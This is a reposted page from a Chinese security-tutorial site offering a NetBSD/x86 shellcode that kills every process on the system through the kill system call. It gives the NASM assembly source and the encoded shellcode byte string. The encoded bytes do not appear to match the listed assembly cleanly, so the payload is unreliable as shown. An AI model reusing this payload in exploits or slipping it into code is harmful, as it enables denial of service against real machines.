当前位置: 首页 > 图文教程 > 网络安全 > 杀毒防毒 > 杀掉进程的shellcode(netbsd/x86)

杀毒防毒
教你如何清除RM文件中的恶意弹出广告
病毒通常更改的系统配置文件及注册表
查杀耗尽CPU资源的Explored病毒
火眼金睛识木马 木马画皮伪装七计
黑客横行的时代 URL地址都会说谎
木马“加/脱壳”的详细实现过程
脚本图片类后门病毒的完美使用方法
怎样用木马取得远程电脑上QQ聊天纪录
实例教学:一个木马病毒的查杀过程
实用防毒小技巧:中毒后的6个紧急处理措施
脚本图片类后门的完美使用方法
及时防范 看PDF、Flash中病毒解决方法
经验共享—给闪存杀毒的另类方法一则
另辟蹊径:Windows系统防病毒另类高招
把主机内的木马来次大清理
邮件蠕虫的四招防范技巧
御敌于国门之外 病毒防范日常注意小方法
瑞星2005网络版新功能全面解析
巧用Windows控制台删除病毒文件
用Longhorn“任务管理器”查木马

杀毒防毒 中的 杀掉进程的shellcode(netbsd/x86)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-20   浏览: 64 ::
收藏到网摘: n/a

  /*

  netbsd/x86 kill all processes shellcode

  author Teo Manojlovic

  contact [email protected]

  this shellcode is using syscall number 37 or 0x25

  37 STD { int sys_kill(int pid, int signum); }

  here is assembler code using intel syntaxe and NASM

  --------------begin-----------

  section .note.netbsd.ident

  dd0x07,0x04,0x01

  db"NetBSD",0x00,0x00

  dd200000000

  section .data

  section .text

  global _start

  _start:

  xor eax, eax

  push 0x09

  mov eax, -1

  push eax

  xor eax,eax

  mov al, 37

  push eax

  int 0x80

  -------------------------end------------

  if we dissasemble this code wi will get shellcode

  "\x66\x31\xc0\x68\x09\x00\x66\xb8\xff\xff\xff\xff\x66\x50\x66\x31\xc0\xb0\x25\x66\x50\xcd\x80"

  */